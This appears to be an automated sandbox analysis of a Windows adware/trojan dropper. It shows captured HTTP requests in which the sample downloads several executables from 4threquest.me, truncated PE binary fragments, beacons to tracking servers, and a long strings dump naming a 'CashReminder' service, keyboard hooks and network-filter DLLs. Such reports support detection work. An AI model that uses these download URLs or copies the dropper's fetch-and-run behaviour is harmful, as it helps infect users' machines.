GET /v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action2=visit&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,pcm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.53 ms","message":"store 3 action and 5 update "}..0......
GET /v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=install.pcm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.54 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:58 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.54 ms","message":"store 1 action and 0 update "}..0..
GET /310714d/240714_ps.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:27 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 523264
Content-Description: File Transfer
Content-Disposition: attachment; filename="240714_ps.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z....... ...0.......p....@.......................... ...............................................s.......................................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......p...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....nD..H.P.u..u..u...Hr@..B...SV.5.nD..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h..D.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...nD...Si.. ..VW.T.....tO.q.3.;5.nD.sB..i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5.nD.r._^[...U..QQ.U.SV..i.. .
<<< skipped >>>
GET /310714d/310714_a9.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:29 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 503904
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_a9.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........;...;...;...]r_.|....<V.<....Z\......Z^.p....Z_.....2...(...;.......]rB.6...]rX.:...;...:...]r].:...Rich;...................PE..L...X,.U.................<...T......3o.......P....@..................................t....@..................................i..........................`........;..`S..8............................D..@............P...............................text....:.......<.................. ..`.rdata...(...P...*...@..............@..@.data....g.......F...j..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................U..V...y-...E..t.V..6.......^]...................O-.............U..j.h.;E.d.....P.... .F.3..E.VWP.E.d........}.j..u...&...E......F......F...F......F..3..F.....f.F..F.f.F .F$.F(.F,.F0.E....u(.E.P.M..E...F..P,..h.YF..E.P.E. bE..%e..WV..#........M.d......Y_^.M.3..4 ....]....V..V..$...F,.....t.P..3......F,.....F$..t.P..3......F$.....F...t.P..3......F......F...t.P..3......F......F...t.P..3......F......F...t.P..3......F.......^..%....U..V.u..... .... bE...^]........U...E..V....daE.t.V.
<<< skipped >>>
GET /310714d/310714_am2.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:33 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 311296
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_am2.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x....u...u...u..a....u..o....u.3W....u.......u.....7.u.......u..a....u...t.*.u.......u.......u.......u.Rich..u.........................PE..L......T..........................................@.......................................@..................................|..........(........................)..................................xR..@...............L............................text............................... ..`.rdata..............................@..@.data....:...........v..............@....rsrc...(...........................@..@.reloc...).......*..................@..B........................................................................................................................................................................................................................................................................................................................j...4...............................t.j.j.j.P....D...P....D.....................3.9.................t.j.j.j.P....D...P....D....>....................t.j.j.j.P....D...P....D.....3..H..H.........3....D....D..|.D..x.D....D..x.D..................=\.D..u.3...=`.D...L.D.s..L.D..U..j.h..C.d.....PSVW.D.D.3.P.E.d......E..}....LD......3.3..O.._.f.W..]..O8._4f.W$.w@.E...N.3..^.f.....Q..U....I.f.....f;.u. M...Q.*....GtHJD.................._x............................................_l._p.......Gh....._`._d.........
<<< skipped >>>
GET /services/stores?dummy=526 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:14 GMT
Content-Type: text/html
Connection: close
P3P: CP="Potato"
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Origin: *
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
related.deals.aliexpress.com.viagens.americanas.com.br.americanas.com.br.azulviagens.com.br.casasbahia.com.br.catho.com.br.centauro.com.br.citylar.com.br.colcci.com.br.colombo.com.br.cvc.com.br.dafiti.com.br.decolar.com.extra.com.br.fastshop.com.br.fnac.com.br.forum.com.br.girafa.com.br.voegol.com.br.insinuante.com.br.kanui.com.br.lenovo.com.br.lojaskd.com.br.magazineluiza.com.br.marisa.com.br.megamamute.com.br.mobly.com.br.netshoes.com.br.polishop.com.br.pontofrio.com.br.posthaus.com.br.ricardoeletro.com.br.rihappy.com.br.samsclub.com.br.saraiva.com.br.sepha.com.br.sephora.com.br.shopfato.com.br.shoptime.com.br.submarino.com.br.submarinoviagens.com.br.tam.com.br.walmart.com.br...
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1396:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
ShowWebInPopUp
ShowWebInPopUp
\LOCALS~1\Temp\nst3.tmp\nsWeb.dll
\LOCALS~1\Temp\nst3.tmp\nsWeb.dll
B3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe
B3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe
ndex.php /ta /ci 9664 /i MyBestOffersTodayBR
ndex.php /ta /ci 9664 /i MyBestOffersTodayBR
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\nsWeb.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\nsWeb.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
n%D,3
n%D,3
GetProcessHeap
GetProcessHeap
OLEAUT32.dll
OLEAUT32.dll
CreateURLMoniker
CreateURLMoniker
urlmon.dll
urlmon.dll
WININET.dll
WININET.dll
nsWeb.dll
nsWeb.dll
ShowWebInPage
ShowWebInPage
MSHTML.DLL
MSHTML.DLL
1 1$1(1,1014181
1 1$1(1,1014181
t%SSj
t%SSj
GetWindowsDirectoryW
GetWindowsDirectoryW
RegEnumKeyExW
RegEnumKeyExW
RegEnumKeyExA
RegEnumKeyExA
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
registry.dll
registry.dll
_CopyKey
_CopyKey
_CreateKey
_CreateKey
_DeleteKey
_DeleteKey
_DeleteKeyEmpty
_DeleteKeyEmpty
_KeyExists
_KeyExists
_MoveKey
_MoveKey
_RestoreKey
_RestoreKey
_SaveKey
_SaveKey
.reloc
.reloc
System.dll
System.dll
callback%d
callback%d
@.reloc
@.reloc
d2.kX
d2.kX
W.uje
W.uje
nst3.tmp
nst3.tmp
\LOCALS~1\Temp\nst3.tmp
\LOCALS~1\Temp\nst3.tmp
3886080
3886080
c:\%original file name%.exe
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
-2063532032
-2063532032
-2147284440
-2147284440
Nullsoft Install System v2.46
Nullsoft Install System v2.46
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
%s /s "%s"
%s /s "%s"
regedit.exe
regedit.exe
REG_KEY
REG_KEY
%s%s%s
%s%s%s
x,
x,
=hex(%x):
=hex(%x):
=dword:x
=dword:x
="%s"
="%s"
[%s\%s]
[%s\%s]
[-%s\%s]
[-%s\%s]
Windows Registry Editor Version 5.00
Windows Registry Editor Version 5.00
7.8.5.9
7.8.5.9
%original file name%.exe_1396_rwx_01134000_00001000:
callback%d
callback%d
q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe_1316:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
ShowWebInPopUp
ShowWebInPopUp
\LOCALS~1\Temp\nsq6.tmp\nsWeb.dll
\LOCALS~1\Temp\nsq6.tmp\nsWeb.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq6.tmp\nsWeb.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq6.tmp\nsWeb.dll
%Program Files%
%Program Files%
\nsWeb.dll
\nsWeb.dll
hXXp://goo.gl/Bw14Po
hXXp://goo.gl/Bw14Po
$$\wininit.ini
$$\wininit.ini
@.reloc
@.reloc
n%D,3
n%D,3
GetProcessHeap
GetProcessHeap
OLEAUT32.dll
OLEAUT32.dll
CreateURLMoniker
CreateURLMoniker
urlmon.dll
urlmon.dll
WININET.dll
WININET.dll
nsWeb.dll
nsWeb.dll
ShowWebInPage
ShowWebInPage
MSHTML.DLL
MSHTML.DLL
1 1$1(1,1014181
1 1$1(1,1014181
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq6.tmp
nsq6.tmp
nsq6.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq6.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\O15O8WbPqkjNWDUfU8L4Mr8GpVb15O8WbPqkjNWDUfU8L4Mr8GpVb
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\O15O8WbPqkjNWDUfU8L4Mr8GpVb15O8WbPqkjNWDUfU8L4Mr8GpVb
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe
q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl4.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
8.9.3.9
8.9.3.9
310714_is.exe_1880:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
SYh%f
SYh%f
kernel32.dll
kernel32.dll
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
File I/O error %d
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
lzmadecompsmall: %s
LzmaDecode failed (%d)
LzmaDecode failed (%d)
shell32.dll
shell32.dll
/SL5="$%x,%d,%d,
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.5.0)
Inno Setup Setup Data (5.5.0)
Inno Setup Messages (5.5.0)
Inno Setup Messages (5.5.0)
user32.dll
user32.dll
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
GetWindowsDirectoryA
GetWindowsDirectoryA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ExitWindowsEx
ExitWindowsEx
comctl32.dll
comctl32.dll
name="JR.Inno.Setup"
name="JR.Inno.Setup"
version="1.0.0.0"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
true
true
!'%s' is not a valid integer value('%s' is not a valid floating point value
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
Invalid variant operation"Variant method calls not supported
External exception %x
External exception %x
Web Setup
Web Setup
5.3.2.4
5.3.2.4
2.0.7
2.0.7
310714_is.tmp_1388:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
c:\Projects\Basic\Release\Basic.pdb
c:\Projects\Basic\Release\Basic.pdb
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
_crt_debugger_hook
_crt_debugger_hook
MSVCR90.dll
MSVCR90.dll
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
CashReminder.exe_1232:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
EInvalidGraphicOperation
EInvalidGraphicOperation
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
Proportional
Proportional
MAPI32.DLL
MAPI32.DLL
TURLAction
TURLAction
HelpKeywordp
HelpKeywordp
TURLDownloadStatus
TURLDownloadStatus
dsBeginSyncOperation
dsBeginSyncOperation
dsEndSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
dsFilterReportMIMEType
TDownLoadURL
TDownLoadURL
URLMON.DLL
URLMON.DLL
URLDownloadToFileA
URLDownloadToFileA
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeywordT
HelpKeywordT
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview
KeyPreview
WindowState
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
Password
Password
OnExecutepWE
OnExecutepWE
content-security-policy-report-only
content-security-policy-report-only
127.0.0.1
127.0.0.1
255.0.0.0
255.0.0.0
ServiceExecute
ServiceExecute
\P_StoreList.txt
\P_StoreList.txt
\P_CheckUpdate.txt
\P_CheckUpdate.txt
\cr_update.exe
\cr_update.exe
hXXp://VVV.related.deals/services/rules?dummy=
hXXp://VVV.related.deals/services/rules?dummy=
hXXp://VVV.related.deals/services/stores?dummy=
hXXp://VVV.related.deals/services/stores?dummy=
hXXp://VVV.related.deals/services/update/
hXXp://VVV.related.deals/services/update/
\P_RuleList.txt
\P_RuleList.txt
[N] ProductKey :
[N] ProductKey :
cmd.exe /c net start CashReminder
cmd.exe /c net start CashReminder
cmd.exe /c net stop CashReminder
cmd.exe /c net stop CashReminder
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
ReportEventA
ReportEventA
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
WinExec
WinExec
GetCPInfo
GetCPInfo
version.dll
version.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
wsock32.dll
wsock32.dll
nfapi.dll
nfapi.dll
nf_tcpDisableFiltering
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_setTCPTimeout
nf_tcpClose
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpPostSend
nf_tcpSetConnectionState
nf_tcpSetConnectionState
psapi.dll
psapi.dll
ProtocolFilters.dll
ProtocolFilters.dll
5l6O6W6
5l6O6W6
?!?%?)?-?1?5?9?=?
?!?%?)?-?1?5?9?=?
5%6x6
5%6x6
1 1$1(1,1014181
1 1$1(1,1014181
0&0.080=0
0&0.080=0
2%3)3-31383
2%3)3-31383
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
1#1'1 1/13171;1
=!=,=7=?=_=
=!=,=7=?=_=
5 5$5(5,505
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3
3 3$3(3,3034383
3 3$3(3,3034383
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
3333333
3333333
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
KWindows
KWindows
UrlMon
UrlMon
OnExecute
OnExecute
No help keyword specified.
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Service failed on %s: %s
Unsupported clipboard format
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
!'%s' is not a valid integer value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
WNet.exe_2284:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
